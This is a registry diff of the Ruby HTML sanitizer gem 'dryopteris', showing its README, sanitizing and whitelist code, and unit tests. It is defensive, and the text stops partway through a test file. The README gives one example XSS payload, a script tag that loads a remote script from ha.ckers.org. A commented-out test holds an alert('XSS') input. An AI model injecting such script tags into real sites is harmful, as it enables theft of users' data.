jmcnevin-dryopteris 0.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
data/README.markdown ADDED
@@ -0,0 +1,97 @@
1
+ Dryopteris
2
+ ==========
3
+
4
+ Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
5
+
6
+ * [Dryopteris erythrosora](http://en.wikipedia.org/wiki/Dryopteris_erythrosora)
7
+ * [XSS Attacks](http://en.wikipedia.org/wiki/Cross-site_scripting)
8
+
9
+ Usage
10
+ -----
11
+
12
+ Let's say you run a web site, and you allow people to post HTML snippets.
13
+
14
+ Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:
15
+
16
+ <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
17
+
18
+ Oooh, that could be bad. Here's how to fix it:
19
+
20
+ safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
21
+
22
+ Yeah, it's that easy.
23
+
24
+ In this example, <tt>safe\_html\_snippet</tt> will have all of its __broken markup fixed__ by libxml2, and it will also be completely __sanitized of harmful tags and attributes__. That's twice as clean!
25
+
26
+
27
+ Sanitization Usage
28
+ -----
29
+
30
+ You're still here? Ok, let me tell you a little something about the two different methods of sanitizing the Dryopteris offers.
31
+
32
+ ### Fragments
33
+
34
+ The first method is for _html fragments_, which are small snippets of markup such as those used in forum posts, emails and homework assignments.
35
+
36
+ Usage is the same as above:
37
+
38
+ safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
39
+
40
+ Generally speaking, unless you expect to have &lt;html&gt; and &lt;body&gt; tags in your HTML, this is the sanitizing method to use.
41
+
42
+ The only real limitation on this method is that the snippet must be a string object. (Support for IO objects was sacrificed at the altar of fixer-uppery-ness. If you need to sanitize data that's coming from an IO object, either socket or file, check out the next section on __Documents__).
43
+
44
+ ### Documents
45
+
46
+ Sometimes you need to sanitize an entire HTML document. (Well, maybe not _you_, but other people, certainly.)
47
+
48
+ safe_html_document = Dryopteris.sanitize_document(dangerous_html_document)
49
+
50
+ The returned string will contain exactly one (1) well-formed HTML document, with all broken HTML fixed and all harmful tags and attributes removed.
51
+
52
+ Coolness: <tt>dangerous\_html\_document</tt> can be a string OR an IO object (a file, or a socket, or ...). Which makes it particularly easy to sanitize large numbers of docs.
53
+
54
+ Whitewashing Usage
55
+ -----
56
+
57
+ ### Whitewashing Fragments
58
+
59
+ Other times, you may want to remove all styling, attributes and invalid HTML tags. I like to call this "whitewashing", since it's putting a new layer of paint on top of the HTML input to make it look nice.
60
+
61
+ One use case for this feature is to clean up HTML that was cut-and-pasted from Microsoft(tm) Word into a WYSIWYG editor/textarea. Microsoft's editor is famous for injecting all kinds of cruft into its HTML output. Who needs that? Certainly not me.
62
+
63
+ whitewashed_html = Dryopteris.whitewash(ugly_microsoft_html_snippet)
64
+
65
+ Please note that whitewashing implicitly also sanitizes your HTML, as it uses the same HTML tag whitelist as <tt>sanitize()</tt>. It's implementation is:
66
+
67
+ 1. unless the tag is on the whitelist, remove it from the document
68
+ 2. if the tag has an XML namespace on it, remove it from the document
69
+ 2. remove all attributes from the node
70
+
71
+ ### Whitewashing Documents
72
+
73
+ Also note the existence of <tt>whitewash\_document</tt>, which is analogous to <tt>sanitize\_document</tt>.
74
+
75
+ Standing on the Shoulders of Giants
76
+ -----
77
+
78
+ Dryopteris uses [Nokogiri](http://nokogiri.rubyforge.org/) and [libxml2](http://xmlsoft.org/), so it's fast.
79
+
80
+ Dryopteris also takes its tag and tag attribute whitelists and its CSS sanitizer directly from [HTML5](http://code.google.com/p/html5lib/).
81
+
82
+
83
+ Authors
84
+ -----
85
+ * [Bryan Helmkamp](http://www.brynary.com/)
86
+ * [Mike Dalessio](http://mike.daless.io/) ([twitter](http://twitter.com/flavorjones))
87
+
88
+
89
+ Quotes About Dryopteris
90
+ -----
91
+
92
+ > "dryopteris shields you from xss attacks using nokogiri and NY attitude"
93
+ > - [hasmanyjosh](http://blog.hasmanythrough.com/)
94
+
95
+ > "I just wanted to say thank you for your dryopteris plugin. It is by far the best sanitization I've found."
96
+ > - [catalystmediastudios](http://github.com/catalystmediastudios)
97
+
data/VERSION.yml ADDED
@@ -0,0 +1,4 @@
1
+ ---
2
+ :major: 0
3
+ :minor: 0
4
+ :patch: 0
data/lib/dryopteris.rb ADDED
@@ -0,0 +1,12 @@
1
+ $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__))) unless $LOAD_PATH.include?(File.expand_path(File.dirname(__FILE__)))
2
+
3
+ require 'rubygems'
4
+ gem 'nokogiri', '>=1.2.4'
5
+ require 'nokogiri'
6
+
7
+ require "dryopteris/whitelist"
8
+ require "dryopteris/sanitize"
9
+
10
+ module Dryopteris
11
+ VERSION = '0.1'
12
+ end
@@ -0,0 +1,46 @@
1
+ require "dryopteris"
2
+
3
+ module Dryopteris
4
+ module RailsExtension
5
+ def self.included(base)
6
+ base.extend(ClassMethods)
7
+
8
+ # sets up default of stripping tags for all fields
9
+ base.class_eval do
10
+ before_save :sanitize_fields
11
+ class_inheritable_reader :dryopteris_options
12
+ end
13
+ end
14
+
15
+ module ClassMethods
16
+ def sanitize_fields(options = {})
17
+ write_inheritable_attribute(:dryopteris_options, {
18
+ :except => (options[:except] || []),
19
+ :allow_tags => (options[:allow_tags] || [])
20
+ })
21
+ end
22
+
23
+ alias_method :sanitize_field, :sanitize_fields
24
+ end
25
+
26
+
27
+ def sanitize_fields
28
+ self.class.columns.each do |column|
29
+ next unless (column.type == :string || column.type == :text)
30
+
31
+ field = column.name.to_sym
32
+ value = self[field]
33
+
34
+ if dryopteris_options && dryopteris_options[:except].include?(field)
35
+ next
36
+ elsif dryopteris_options && dryopteris_options[:allow_tags].include?(field)
37
+ self[field] = Dryopteris.sanitize(value)
38
+ else
39
+ self[field] = Dryopteris.strip_tags(value)
40
+ end
41
+ end
42
+
43
+ end
44
+
45
+ end
46
+ end
@@ -0,0 +1,175 @@
1
+ require 'cgi'
2
+
3
+ module Dryopteris
4
+
5
+ class << self
6
+ def strip_tags(string_or_io, encoding=nil)
7
+ return nil if string_or_io.nil?
8
+ return "" if string_or_io.strip.size == 0
9
+
10
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
11
+ body_element = doc.at("/html/body")
12
+ return "" if body_element.nil?
13
+ body_element.inner_text
14
+ end
15
+
16
+
17
+ def whitewash(string, encoding=nil)
18
+ return nil if string.nil?
19
+ return "" if string.strip.size == 0
20
+
21
+ string = "<html><body>" + string + "</body></html>"
22
+ doc = Nokogiri::HTML.parse(string, nil, encoding)
23
+ body = doc.xpath("/html/body").first
24
+ return "" if body.nil?
25
+ body.children.each do |node|
26
+ traverse_conditionally_top_down(node, :whitewash_node)
27
+ end
28
+ body.children.map { |x| x.to_xml }.join
29
+ end
30
+
31
+ def whitewash_document(string_or_io, encoding=nil)
32
+ return nil if string_or_io.nil?
33
+ return "" if string_or_io.strip.size == 0
34
+
35
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
36
+ body = doc.xpath("/html/body").first
37
+ return "" if body.nil?
38
+ body.children.each do |node|
39
+ traverse_conditionally_top_down(node, :whitewash_node)
40
+ end
41
+ body.children.map { |x| x.to_xml }.join
42
+ end
43
+
44
+
45
+ def sanitize(string, encoding=nil)
46
+ return nil if string.nil?
47
+ return "" if string.strip.size == 0
48
+
49
+ string = "<html><body>" + string + "</body></html>"
50
+ doc = Nokogiri::HTML.parse(string, nil, encoding)
51
+ body = doc.xpath("/html/body").first
52
+ return "" if body.nil?
53
+ body.children.each do |node|
54
+ traverse_conditionally_top_down(node, :sanitize_node)
55
+ end
56
+ body.children.map { |x| x.to_xml }.join
57
+ end
58
+
59
+ def sanitize_document(string_or_io, encoding=nil)
60
+ return nil if string_or_io.nil?
61
+ return "" if string_or_io.strip.size == 0
62
+
63
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
64
+ elements = doc.xpath("/html/head/*","/html/body/*")
65
+ return "" if (elements.nil? || elements.empty?)
66
+ elements.each do |node|
67
+ traverse_conditionally_top_down(node, :sanitize_node)
68
+ end
69
+ doc.root.to_xml
70
+ end
71
+
72
+ private
73
+
74
+ def traverse_conditionally_top_down(node, method_name)
75
+ return if send(method_name, node)
76
+ node.children.each {|j| traverse_conditionally_top_down(j, method_name)}
77
+ end
78
+
79
+ def remove_tags_from_node(node)
80
+ replacement_killer = Nokogiri::XML::Text.new(node.text, node.document)
81
+ node.add_next_sibling(replacement_killer)
82
+ node.remove
83
+ return true
84
+ end
85
+
86
+ def sanitize_node(node)
87
+ case node.type
88
+ when 1 # Nokogiri::XML::Node::ELEMENT_NODE
89
+ if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
90
+ node.attributes.each do |attr|
91
+ node.remove_attribute(attr.first) unless HashedWhiteList::ALLOWED_ATTRIBUTES[attr.first]
92
+ end
93
+ node.attributes.each do |attr|
94
+ if HashedWhiteList::ATTR_VAL_IS_URI[attr.first]
95
+ # this block lifted nearly verbatim from HTML5 sanitization
96
+ val_unescaped = CGI.unescapeHTML(attr.last.to_s).gsub(/`|[\000-\040\177\s]+|\302[\200-\240]/,'').downcase
97
+ if val_unescaped =~ /^[a-z0-9][-+.a-z0-9]*:/ and HashedWhiteList::ALLOWED_PROTOCOLS[val_unescaped.split(':')[0]].nil?
98
+ node.remove_attribute(attr.first)
99
+ end
100
+ end
101
+ end
102
+ if node.attributes['style']
103
+ node['style'] = sanitize_css(node.attributes['style'])
104
+ end
105
+ return false
106
+ end
107
+ when 3 # Nokogiri::XML::Node::TEXT_NODE
108
+ return false
109
+ when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
110
+ return false
111
+ end
112
+ replacement_killer = Nokogiri::XML::Text.new(node.to_s, node.document)
113
+ node.add_next_sibling(replacement_killer)
114
+ node.remove
115
+ return true
116
+ end
117
+
118
+
119
+ def whitewash_node(node)
120
+ case node.type
121
+ when 1 # Nokogiri::XML::Node::ELEMENT_NODE
122
+ if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
123
+ node.attributes.each { |attr| node.remove_attribute(attr.first) }
124
+ has_no_namespaces = true
125
+ begin
126
+ has_no_namespaces = node.namespaces.empty?
127
+ rescue
128
+ # older versions of nokogiri raise an exception when there
129
+ # is a namespace on the node that is not declared with an href.
130
+ # see http://github.com/tenderlove/nokogiri/commit/395d7971304e1489e92c494b9c50609f4b4c4ab0
131
+ has_no_namespaces = false
132
+ end
133
+ return false if has_no_namespaces
134
+ end
135
+ when 3 # Nokogiri::XML::Node::TEXT_NODE
136
+ return false
137
+ when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
138
+ return false
139
+ end
140
+ node.remove
141
+ return true
142
+ end
143
+
144
+
145
+ # this liftend nearly verbatim from html5
146
+ def sanitize_css(style)
147
+ # disallow urls
148
+ style = style.to_s.gsub(/url\s*\(\s*[^\s)]+?\s*\)\s*/, ' ')
149
+
150
+ # gauntlet
151
+ return '' unless style =~ /^([:,;#%.\sa-zA-Z0-9!]|\w-\w|\'[\s\w]+\'|\"[\s\w]+\"|\([\d,\s]+\))*$/
152
+ return '' unless style =~ /^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$/
153
+
154
+ clean = []
155
+ style.scan(/([-\w]+)\s*:\s*([^:;]*)/) do |prop, val|
156
+ next if val.empty?
157
+ prop.downcase!
158
+ if HashedWhiteList::ALLOWED_CSS_PROPERTIES[prop]
159
+ clean << "#{prop}: #{val};"
160
+ elsif %w[background border margin padding].include?(prop.split('-')[0])
161
+ clean << "#{prop}: #{val};" unless val.split().any? do |keyword|
162
+ HashedWhiteList::ALLOWED_CSS_KEYWORDS[keyword].nil? and
163
+ keyword !~ /^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$/
164
+ end
165
+ elsif HashedWhiteList::ALLOWED_SVG_PROPERTIES[prop]
166
+ clean << "#{prop}: #{val};"
167
+ end
168
+ end
169
+
170
+ style = clean.join(' ')
171
+ end
172
+
173
+ end # self
174
+
175
+ end
@@ -0,0 +1,159 @@
1
+ #
2
+ # HTML whitelist lifted from HTML5 sanitizer code
3
+ # http://code.google.com/p/html5lib/
4
+ #
5
+
6
+ module Dryopteris
7
+ module WhiteList
8
+ # <html5_license>
9
+ #
10
+ # Copyright (c) 2006-2008 The Authors
11
+ #
12
+ # Contributors:
13
+ # James Graham - jg307@cam.ac.uk
14
+ # Anne van Kesteren - annevankesteren@gmail.com
15
+ # Lachlan Hunt - lachlan.hunt@lachy.id.au
16
+ # Matt McDonald - kanashii@kanashii.ca
17
+ # Sam Ruby - rubys@intertwingly.net
18
+ # Ian Hickson (Google) - ian@hixie.ch
19
+ # Thomas Broyer - t.broyer@ltgt.net
20
+ # Jacques Distler - distler@golem.ph.utexas.edu
21
+ # Henri Sivonen - hsivonen@iki.fi
22
+ # The Mozilla Foundation (contributions from Henri Sivonen since 2008)
23
+ #
24
+ # Permission is hereby granted, free of charge, to any person
25
+ # obtaining a copy of this software and associated documentation
26
+ # files (the "Software"), to deal in the Software without
27
+ # restriction, including without limitation the rights to use, copy,
28
+ # modify, merge, publish, distribute, sublicense, and/or sell copies
29
+ # of the Software, and to permit persons to whom the Software is
30
+ # furnished to do so, subject to the following conditions:
31
+ #
32
+ # The above copyright notice and this permission notice shall be
33
+ # included in all copies or substantial portions of the Software.
34
+ #
35
+ # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
36
+ # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
37
+ # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
38
+ # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
39
+ # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
40
+ # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
41
+ # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
42
+ # DEALINGS IN THE SOFTWARE.
43
+ #
44
+ # </html5_license>
45
+
46
+ ACCEPTABLE_ELEMENTS = %w[a abbr acronym address area b big blockquote br
47
+ button caption center cite code col colgroup dd del dfn dir div dl dt
48
+ em fieldset font form h1 h2 h3 h4 h5 h6 hr i img input ins kbd label
49
+ legend li map menu ol optgroup option p pre q s samp select small span
50
+ strike strong sub sup table tbody td textarea tfoot th thead tr tt u
51
+ ul var]
52
+
53
+ MATHML_ELEMENTS = %w[maction math merror mfrac mi mmultiscripts mn mo
54
+ mover mpadded mphantom mprescripts mroot mrow mspace msqrt mstyle msub
55
+ msubsup msup mtable mtd mtext mtr munder munderover none]
56
+
57
+ SVG_ELEMENTS = %w[a animate animateColor animateMotion animateTransform
58
+ circle defs desc ellipse font-face font-face-name font-face-src g
59
+ glyph hkern image linearGradient line marker metadata missing-glyph
60
+ mpath path polygon polyline radialGradient rect set stop svg switch
61
+ text title tspan use]
62
+
63
+ ACCEPTABLE_ATTRIBUTES = %w[abbr accept accept-charset accesskey action
64
+ align alt axis border cellpadding cellspacing char charoff charset
65
+ checked cite class clear cols colspan color compact coords datetime
66
+ dir disabled enctype for frame headers height href hreflang hspace id
67
+ ismap label lang longdesc maxlength media method multiple name nohref
68
+ noshade nowrap prompt readonly rel rev rows rowspan rules scope
69
+ selected shape size span src start style summary tabindex target title
70
+ type usemap valign value vspace width xml:lang]
71
+
72
+ MATHML_ATTRIBUTES = %w[actiontype align columnalign columnalign
73
+ columnalign columnlines columnspacing columnspan depth display
74
+ displaystyle equalcolumns equalrows fence fontstyle fontweight frame
75
+ height linethickness lspace mathbackground mathcolor mathvariant
76
+ mathvariant maxsize minsize other rowalign rowalign rowalign rowlines
77
+ rowspacing rowspan rspace scriptlevel selection separator stretchy
78
+ width width xlink:href xlink:show xlink:type xmlns xmlns:xlink]
79
+
80
+ SVG_ATTRIBUTES = %w[accent-height accumulate additive alphabetic
81
+ arabic-form ascent attributeName attributeType baseProfile bbox begin
82
+ by calcMode cap-height class color color-rendering content cx cy d dx
83
+ dy descent display dur end fill fill-rule font-family font-size
84
+ font-stretch font-style font-variant font-weight from fx fy g1 g2
85
+ glyph-name gradientUnits hanging height horiz-adv-x horiz-origin-x id
86
+ ideographic k keyPoints keySplines keyTimes lang marker-end
87
+ marker-mid marker-start markerHeight markerUnits markerWidth
88
+ mathematical max min name offset opacity orient origin
89
+ overline-position overline-thickness panose-1 path pathLength points
90
+ preserveAspectRatio r refX refY repeatCount repeatDur
91
+ requiredExtensions requiredFeatures restart rotate rx ry slope stemh
92
+ stemv stop-color stop-opacity strikethrough-position
93
+ strikethrough-thickness stroke stroke-dasharray stroke-dashoffset
94
+ stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity
95
+ stroke-width systemLanguage target text-anchor to transform type u1
96
+ u2 underline-position underline-thickness unicode unicode-range
97
+ units-per-em values version viewBox visibility width widths x
98
+ x-height x1 x2 xlink:actuate xlink:arcrole xlink:href xlink:role
99
+ xlink:show xlink:title xlink:type xml:base xml:lang xml:space xmlns
100
+ xmlns:xlink y y1 y2 zoomAndPan]
101
+
102
+ ATTR_VAL_IS_URI = %w[href src cite action longdesc xlink:href xml:base]
103
+
104
+ ACCEPTABLE_CSS_PROPERTIES = %w[azimuth background-color
105
+ border-bottom-color border-collapse border-color border-left-color
106
+ border-right-color border-top-color clear color cursor direction
107
+ display elevation float font font-family font-size font-style
108
+ font-variant font-weight height letter-spacing line-height overflow
109
+ pause pause-after pause-before pitch pitch-range richness speak
110
+ speak-header speak-numeral speak-punctuation speech-rate stress
111
+ text-align text-decoration text-indent unicode-bidi vertical-align
112
+ voice-family volume white-space width]
113
+
114
+ ACCEPTABLE_CSS_KEYWORDS = %w[auto aqua black block blue bold both bottom
115
+ brown center collapse dashed dotted fuchsia gray green !important
116
+ italic left lime maroon medium none navy normal nowrap olive pointer
117
+ purple red right solid silver teal top transparent underline white
118
+ yellow]
119
+
120
+ ACCEPTABLE_SVG_PROPERTIES = %w[fill fill-opacity fill-rule stroke
121
+ stroke-width stroke-linecap stroke-linejoin stroke-opacity]
122
+
123
+ ACCEPTABLE_PROTOCOLS = %w[ed2k ftp http https irc mailto news gopher nntp
124
+ telnet webcal xmpp callto feed urn aim rsync tag ssh sftp rtsp afs]
125
+
126
+ # subclasses may define their own versions of these constants
127
+ ALLOWED_ELEMENTS = ACCEPTABLE_ELEMENTS + MATHML_ELEMENTS + SVG_ELEMENTS
128
+ ALLOWED_ATTRIBUTES = ACCEPTABLE_ATTRIBUTES + MATHML_ATTRIBUTES + SVG_ATTRIBUTES
129
+ ALLOWED_CSS_PROPERTIES = ACCEPTABLE_CSS_PROPERTIES
130
+ ALLOWED_CSS_KEYWORDS = ACCEPTABLE_CSS_KEYWORDS
131
+ ALLOWED_SVG_PROPERTIES = ACCEPTABLE_SVG_PROPERTIES
132
+ ALLOWED_PROTOCOLS = ACCEPTABLE_PROTOCOLS
133
+
134
+ VOID_ELEMENTS = %w[
135
+ base
136
+ link
137
+ meta
138
+ hr
139
+ br
140
+ img
141
+ embed
142
+ param
143
+ area
144
+ col
145
+ input
146
+ ]
147
+ end
148
+
149
+ module HashedWhiteList
150
+ # turn each of the whitelist arrays into a hash for faster lookup
151
+ WhiteList.constants.each do |constant|
152
+ next unless WhiteList.module_eval("#{constant}").is_a?(Array)
153
+ module_eval <<-CODE
154
+ #{constant} = {}
155
+ WhiteList::#{constant}.each { |c| #{constant}[c] = true ; #{constant}[c.downcase] = true }
156
+ CODE
157
+ end
158
+ end
159
+ end
data/test/helper.rb ADDED
@@ -0,0 +1,8 @@
1
+ require 'test/unit'
2
+ require File.expand_path(File.join(File.dirname(__FILE__), "..", "lib", "dryopteris"))
3
+
4
+ if defined? Nokogiri::VERSION_INFO
5
+ puts "=> running with Nokogiri #{Nokogiri::VERSION_INFO.inspect}"
6
+ else
7
+ puts "=> running with Nokogiri #{Nokogiri::VERSION} / libxml #{Nokogiri::LIBXML_PARSER_VERSION}"
8
+ end
@@ -0,0 +1,185 @@
1
+ #
2
+ # these tests taken from the HTML5 sanitization project and modified for use with Dryopteris
3
+ # see the original here: http://code.google.com/p/html5lib/source/browse/ruby/test/test_sanitizer.rb
4
+ #
5
+ # license text at the bottom of this file
6
+ #
7
+ require File.expand_path(File.join(File.dirname(__FILE__), '..', 'helper'))
8
+
9
+ class SanitizeTest < Test::Unit::TestCase
10
+ include Dryopteris
11
+
12
+ def sanitize_html stream
13
+ Dryopteris.sanitize(stream)
14
+ end
15
+
16
+ def sanitize_doc stream
17
+ Dryopteris.sanitize_document(stream)
18
+ end
19
+
20
+ def check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
21
+ # libxml uses double-quotes, so let's swappo-boppo our quotes before comparing.
22
+ assert_equal htmloutput, sanitize_html(input).gsub(/"/,"'"), input
23
+
24
+ doc = sanitize_doc(input).gsub(/"/,"'")
25
+ assert doc.include?(htmloutput), "#{input}:\n#{doc}\nshould include:\n#{htmloutput}"
26
+ end
27
+
28
+ WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
29
+ define_method "test_should_allow_#{tag_name}_tag" do
30
+ input = "<#{tag_name} title='1'>foo <bad>bar</bad> baz</#{tag_name}>"
31
+ htmloutput = "<#{tag_name.downcase} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name.downcase}>"
32
+ xhtmloutput = "<#{tag_name} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name}>"
33
+ rexmloutput = xhtmloutput
34
+
35
+ ##
36
+ ## these special cases are HTML5-tokenizer-dependent.
37
+ ## libxml2 cleans up HTML differently, and I trust that.
38
+ ##
39
+ # if %w[caption colgroup optgroup option tbody td tfoot th thead tr].include?(tag_name)
40
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
41
+ # xhtmloutput = htmloutput
42
+ # elsif tag_name == 'col'
43
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
44
+ # xhtmloutput = htmloutput
45
+ # rexmloutput = "<col title='1' />"
46
+ # elsif tag_name == 'table'
47
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt;baz<table title='1'> </table>"
48
+ # xhtmloutput = htmloutput
49
+ # elsif tag_name == 'image'
50
+ # htmloutput = "<image title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
51
+ # xhtmloutput = htmloutput
52
+ # rexmloutput = "<image title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</image>"
53
+ if WhiteList::VOID_ELEMENTS.include?(tag_name)
54
+ if Nokogiri::LIBXML_VERSION <= "2.6.16"
55
+ htmloutput = "<#{tag_name} title='1'/><p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
56
+ else
57
+ htmloutput = "<#{tag_name} title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
58
+ end
59
+ xhtmloutput = htmloutput
60
+ # htmloutput += '<br/>' if tag_name == 'br'
61
+ rexmloutput = "<#{tag_name} title='1' />"
62
+ end
63
+ check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
64
+ end
65
+ end
66
+
67
+ ##
68
+ ## libxml2 downcases tag names as it parses, so this is unnecessary.
69
+ ##
70
+ # WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
71
+ # define_method "test_should_forbid_#{tag_name.upcase}_tag" do
72
+ # input = "<#{tag_name.upcase} title='1'>foo <bad>bar</bad> baz</#{tag_name.upcase}>"
73
+ # output = "&lt;#{tag_name.upcase} title=\"1\"&gt;foo &lt;bad&gt;bar&lt;/bad&gt; baz&lt;/#{tag_name.upcase}&gt;"
74
+ # check_sanitization(input, output, output, output)
75
+ # end
76
+ # end
77
+
78
+ WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
79
+ next if attribute_name == 'style'
80
+ next if attribute_name =~ /:/ && Nokogiri::LIBXML_VERSION <= '2.6.16'
81
+ define_method "test_should_allow_#{attribute_name}_attribute" do
82
+ input = "<p #{attribute_name}='foo'>foo <bad>bar</bad> baz</p>"
83
+ output = "<p #{attribute_name}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
84
+ htmloutput = "<p #{attribute_name.downcase}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
85
+ check_sanitization(input, htmloutput, output, output)
86
+ end
87
+ end
88
+
89
+ ##
90
+ ## libxml2 downcases attributes as it parses, so this is unnecessary.
91
+ ##
92
+ # WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
93
+ # define_method "test_should_forbid_#{attribute_name.upcase}_attribute" do
94
+ # input = "<p #{attribute_name.upcase}='display: none;'>foo <bad>bar</bad> baz</p>"
95
+ # output = "<p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
96
+ # check_sanitization(input, output, output, output)
97
+ # end
98
+ # end
99
+
100
+ WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
101
+ define_method "test_should_allow_#{protocol}_uris" do
102
+ input = %(<a href="#{protocol}">foo</a>)
103
+ output = "<a href='#{protocol}'>foo</a>"
104
+ check_sanitization(input, output, output, output)
105
+ end
106
+ end
107
+
108
+ WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
109
+ define_method "test_should_allow_uppercase_#{protocol}_uris" do
110
+ input = %(<a href="#{protocol.upcase}">foo</a>)
111
+ output = "<a href='#{protocol.upcase}'>foo</a>"
112
+ check_sanitization(input, output, output, output)
113
+ end
114
+ end
115
+
116
+ if Nokogiri::LIBXML_VERSION > '2.6.16'
117
+ def test_should_handle_astral_plane_characters
118
+ input = "<p>&#x1d4b5; &#x1d538;</p>"
119
+ output = "<p>\360\235\222\265 \360\235\224\270</p>"
120
+ check_sanitization(input, output, output, output)
121
+
122
+ input = "<p><tspan>\360\235\224\270</tspan> a</p>"
123
+ output = "<p><tspan>\360\235\224\270</tspan> a</p>"
124
+ check_sanitization(input, output, output, output)
125
+ end
126
+ end
127
+
128
+ # This affects only NS4. Is it worth fixing?
129
+ # def test_javascript_includes
130
+ # input = %(<div size="&{alert('XSS')}">foo</div>)
131
+ # output = "<div>foo</div>"
132
+ # check_sanitization(input, output, output, output)
133
+ # end
134
+
135
+ #html5_test_files('sanitizer').each do |filename|
136
+ # JSON::parse(open(filename).read).each do |test|
137
+ # define_method "test_#{test['name']}" do
138
+ # check_sanitization(
139
+ # test['input'],
140
+ # test['output'],
141
+ # test['xhtml'] || test['output'],
142
+ # test['rexml'] || test['output']
143
+ # )
144
+ # end
145
+ # end
146
+ #end
147
+ end
148
+
149
+ # <html5_license>
150
+ #
151
+ # Copyright (c) 2006-2008 The Authors
152
+ #
153
+ # Contributors:
154
+ # James Graham - jg307@cam.ac.uk
155
+ # Anne van Kesteren - annevankesteren@gmail.com
156
+ # Lachlan Hunt - lachlan.hunt@lachy.id.au
157
+ # Matt McDonald - kanashii@kanashii.ca
158
+ # Sam Ruby - rubys@intertwingly.net
159
+ # Ian Hickson (Google) - ian@hixie.ch
160
+ # Thomas Broyer - t.broyer@ltgt.net
161
+ # Jacques Distler - distler@golem.ph.utexas.edu
162
+ # Henri Sivonen - hsivonen@iki.fi
163
+ # The Mozilla Foundation (contributions from Henri Sivonen since 2008)
164
+ #
165
+ # Permission is hereby granted, free of charge, to any person
166
+ # obtaining a copy of this software and associated documentation files
167
+ # (the "Software"), to deal in the Software without restriction,
168
+ # including without limitation the rights to use, copy, modify, merge,
169
+ # publish, distribute, sublicense, and/or sell copies of the Software,
170
+ # and to permit persons to whom the Software is furnished to do so,
171
+ # subject to the following conditions:
172
+ #
173
+ # The above copyright notice and this permission notice shall be
174
+ # included in all copies or substantial portions of the Software.
175
+ #
176
+ # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
177
+ # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
178
+ # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
179
+ # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
180
+ # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
181
+ # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
182
+ # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
183
+ # SOFTWARE.
184
+ #
185
+ # </html5_license>
@@ -0,0 +1,76 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class TestBasic < Test::Unit::TestCase
4
+
5
+ def test_nil
6
+ assert_nil Dryopteris.sanitize(nil)
7
+ end
8
+
9
+ def test_empty_string
10
+ assert_equal "", Dryopteris.sanitize("")
11
+ end
12
+
13
+ def test_removal_of_illegal_tag
14
+ html = <<-HTML
15
+ following this there should be no jim tag
16
+ <jim>jim</jim>
17
+ was there?
18
+ HTML
19
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
20
+ assert sane.xpath("//jim").empty?
21
+ end
22
+
23
+ def test_removal_of_illegal_attribute
24
+ html = "<p class=bar foo=bar abbr=bar />"
25
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
26
+ node = sane.xpath("//p").first
27
+ assert node.attributes['class']
28
+ assert node.attributes['abbr']
29
+ assert_nil node.attributes['foo']
30
+ end
31
+
32
+ def test_removal_of_illegal_url_in_href
33
+ html = <<-HTML
34
